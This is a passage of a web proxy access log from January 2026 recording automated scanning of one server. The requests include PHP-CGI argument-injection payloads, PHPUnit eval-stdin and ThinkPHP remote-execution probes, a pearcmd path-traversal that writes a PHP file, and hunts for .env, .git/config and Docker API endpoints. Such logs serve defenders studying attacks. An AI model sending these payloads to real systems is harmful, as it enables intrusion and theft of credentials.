Safari/537.36" "-" +[19/Jan/2026:18:05:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/news/wp-includes/wlwmanifest.xml" [Client 34.186.92.186] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[19/Jan/2026:18:05:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/2018/wp-includes/wlwmanifest.xml" [Client 34.186.92.186] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[19/Jan/2026:18:05:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/2019/wp-includes/wlwmanifest.xml" [Client 34.186.92.186] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[19/Jan/2026:18:05:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/shop/wp-includes/wlwmanifest.xml" [Client 34.186.92.186] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[19/Jan/2026:18:05:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp1/wp-includes/wlwmanifest.xml" [Client 34.186.92.186] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[19/Jan/2026:18:05:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/test/wp-includes/wlwmanifest.xml" [Client 34.186.92.186] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[19/Jan/2026:18:05:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/media/wp-includes/wlwmanifest.xml" [Client 34.186.92.186] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[19/Jan/2026:18:05:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp2/wp-includes/wlwmanifest.xml" [Client 34.186.92.186] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[19/Jan/2026:18:05:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/site/wp-includes/wlwmanifest.xml" [Client 34.186.92.186] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[19/Jan/2026:18:05:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/cms/wp-includes/wlwmanifest.xml" [Client 34.186.92.186] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[19/Jan/2026:18:05:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/sito/wp-includes/wlwmanifest.xml" [Client 34.186.92.186] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[19/Jan/2026:18:05:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.186.92.186] [Length 0] [Gzip -] "-" "-" +[19/Jan/2026:18:12:03 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:18:14:39 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:18:15:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.37] [Length 1033] [Gzip -] "-" "-" +[19/Jan/2026:18:21:05 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 5.189.153.209] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:18:21:05 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 5.189.153.209] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:18:21:05 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:05 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 5.189.153.209] [Length 154] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:05 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:05 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:05 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:05 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:05 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:06 +0000] 404 - GET http 91.82.83.208 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:06 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:06 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:06 +0000] 404 - GET http 91.82.83.208 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:06 +0000] 404 - GET http 91.82.83.208 "/phpunit/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:06 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:06 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:06 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:06 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:06 +0000] 404 - GET http 91.82.83.208 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:06 +0000] 404 - GET http 91.82.83.208 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:06 +0000] 404 - GET http 91.82.83.208 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:06 +0000] 404 - GET http 91.82.83.208 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:06 +0000] 404 - GET http 91.82.83.208 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:06 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:06 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:06 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:06 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:06 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:06 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:07 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:07 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:07 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:07 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:07 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:07 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:07 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:07 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:07 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:07 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:07 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:07 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:07 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:07 +0000] 404 - GET http 91.82.83.208 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:07 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:07 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../tmp/index1" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:21:07 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 5.189.153.209] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:18:25:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.157.156.190] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[19/Jan/2026:18:28:52 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 23.94.162.106] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:18:33:49 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.18] [Length 1033] [Gzip -] "-" "-" +[19/Jan/2026:18:49:05 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[19/Jan/2026:18:51:22 +0000] 200 - GET http 91.82.83.208 "/" [Client 109.105.8.93] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" +[19/Jan/2026:18:51:22 +0000] 404 - GET http www.msftncsi.com "/ncsi.txt" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.83.208/" +[19/Jan/2026:18:51:22 +0000] 404 - GET http 91.82.83.208 "/HNAP1/" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.83.208/" +[19/Jan/2026:18:53:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 54.226.115.111] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[19/Jan/2026:18:56:15 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:19:00:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:19:09:25 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 23.94.162.106] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:19:09:37 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:19:15:09 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.40] [Length 1033] [Gzip -] "-" "-" +[19/Jan/2026:19:16:47 +0000] 400 - GET http 91.82.83.208 "/" [Client 135.119.112.96] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[19/Jan/2026:19:16:48 +0000] 400 - - http localhost "-" [Client 135.119.112.96] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:19:21:15 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:19:21:44 +0000] 400 - GET http 91.82.83.208 "/api/me" [Client 104.244.79.113] [Length 252] [Gzip -] "Mozilla/5.0" "-" +[19/Jan/2026:19:29:52 +0000] 400 - GET http 91.82.83.208 "/" [Client 199.45.155.84] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[19/Jan/2026:19:29:53 +0000] 400 - - http localhost "-" [Client 199.45.155.84] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:19:29:57 +0000] 400 - GET http 91.82.83.208 "/wiki" [Client 199.45.155.84] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[19/Jan/2026:19:31:58 +0000] 404 - POST http 91.82.83.208 "/goform/formJsonAjaxReq" [Client 91.224.92.14] [Length 150] [Gzip -] "Go-http-client/1.1" "http://91.82.83.208:80/home.asp" +[19/Jan/2026:19:45:09 +0000] 404 - GET http 91.82.83.208 "/bins/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:19:46:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 48.217.187.105] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:19:46:57 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 4.4.3; HUAWEI Y536A1 Build/HuaweiY536A1) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:19:46:57 +0000] 404 - GET http 91.82.83.208 "/api/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:38.0) Gecko/20100101 Firefox/38.0" "-" +[19/Jan/2026:19:46:57 +0000] 404 - GET http 91.82.83.208 "/backend/.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36" "-" +[19/Jan/2026:19:46:58 +0000] 404 - GET http 91.82.83.208 "/admin/.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 OPR/47.0.2631.39" "-" +[19/Jan/2026:19:46:58 +0000] 404 - GET http 91.82.83.208 "/.env.example" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; PPC; 240x320) Opera 8.60 [en]" "-" +[19/Jan/2026:19:46:58 +0000] 404 - GET http 91.82.83.208 "/app_dev.php/_profiler/phpinfo" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.17" "-" +[19/Jan/2026:19:46:58 +0000] 200 - GET http 91.82.83.208 "/?phpinfo=-1" [Client 78.153.140.179] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9) Gecko/2008062908 Firefox/3.0 (Debian-3.0~rc2-2)" "-" +[19/Jan/2026:19:46:58 +0000] 200 - GET http 91.82.83.208 "/?url=.env" [Client 78.153.140.179] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR) AppleWebKit/525.28 (KHTML, like Gecko) Version/3.2.2 Safari/525.28.1" "-" +[19/Jan/2026:19:47:00 +0000] 404 - GET http 91.82.83.208 "/staging/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; BOIE9;ENAU; rv:11.0) like Gecko" "-" +[19/Jan/2026:19:47:01 +0000] 404 - GET http 91.82.83.208 "/app_dev.php/_profiler/open?file=app/config/parameters.yml" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36" "-" +[19/Jan/2026:19:47:01 +0000] 404 - GET http 91.82.83.208 "/phpinfo.php" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.93524" "-" +[19/Jan/2026:19:47:01 +0000] 404 - GET http 91.82.83.208 "/info/" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0" "-" +[19/Jan/2026:19:47:02 +0000] 404 - GET http 91.82.83.208 "/app/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:23.0) Gecko/20100101 Firefox/23.0" "-" +[19/Jan/2026:19:47:02 +0000] 404 - GET http 91.82.83.208 "/phpinfo/" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.9.1.6) Gecko/20100107 Fedora/3.5.6-1.fc12 Firefox/3.5.6" "-" +[19/Jan/2026:19:47:02 +0000] 404 - GET http 91.82.83.208 "/dev/.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.175.0 Safari/530.7" "-" +[19/Jan/2026:19:47:02 +0000] 404 - GET http 91.82.83.208 "/.env.production" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone Simulator; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3" "-" +[19/Jan/2026:19:47:02 +0000] 404 - GET http 91.82.83.208 "/.env.save" [Client 78.153.140.179] [Length 150] [Gzip -] "Dalvik/1.6.0 (Linux; U; Android 4.3; SPH-L710 Build/JSS15J)" "-" +[19/Jan/2026:19:47:02 +0000] 404 - GET http 91.82.83.208 "/demo/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:41.0) Gecko/20100101 Firefox/41.0" "-" +[19/Jan/2026:19:47:02 +0000] 200 - GET http 91.82.83.208 "/?url=.env" [Client 78.153.140.179] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36 OPR/28.0.1750.40" "-" +[19/Jan/2026:19:47:02 +0000] 404 - GET http 91.82.83.208 "/staging/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; ALCATEL 4015T Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.2 Mobile Safari/534.30" "-" +[19/Jan/2026:19:47:02 +0000] 404 - GET http 91.82.83.208 "/app_dev.php/_profiler/open?file=app/config/parameters.yml" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.0 (KHTML, like Gecko) Chrome/2.0.162.0 Safari/530.0" "-" +[19/Jan/2026:19:47:03 +0000] 404 - GET http 91.82.83.208 "/phpinfo.php" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1" "-" +[19/Jan/2026:19:47:03 +0000] 404 - GET http 91.82.83.208 "/info/" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "-" +[19/Jan/2026:19:47:03 +0000] 404 - GET http 91.82.83.208 "/app/.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG-SM-G891A Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36" "-" +[19/Jan/2026:19:47:03 +0000] 404 - GET http 91.82.83.208 "/phpinfo/" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; X500 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[19/Jan/2026:19:47:03 +0000] 404 - GET http 91.82.83.208 "/dev/.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4" "-" +[19/Jan/2026:19:47:03 +0000] 404 - GET http 91.82.83.208 "/.env.production" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" "-" +[19/Jan/2026:19:47:03 +0000] 404 - GET http 91.82.83.208 "/.env.save" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (iPod; U; CPU iPhone OS 41 like Mac OS X; fr-CA) AppleWebKit/532.9 (KHTML like Gecko) Version/4.0.5 Mobile/8B118 Safari/6531.22.7" "-" +[19/Jan/2026:19:50:28 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 23.94.162.106] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:19:53:20 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:19:53:40 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[19/Jan/2026:19:55:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:20:22:05 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:20:24:04 +0000] 400 - GET http 91.82.83.208 "/.env" [Client 162.243.56.10] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[19/Jan/2026:20:24:04 +0000] 400 - GET http 91.82.83.208 "/.git/config" [Client 162.243.56.10] [Length 252] [Gzip -] "Mozilla/5.0; 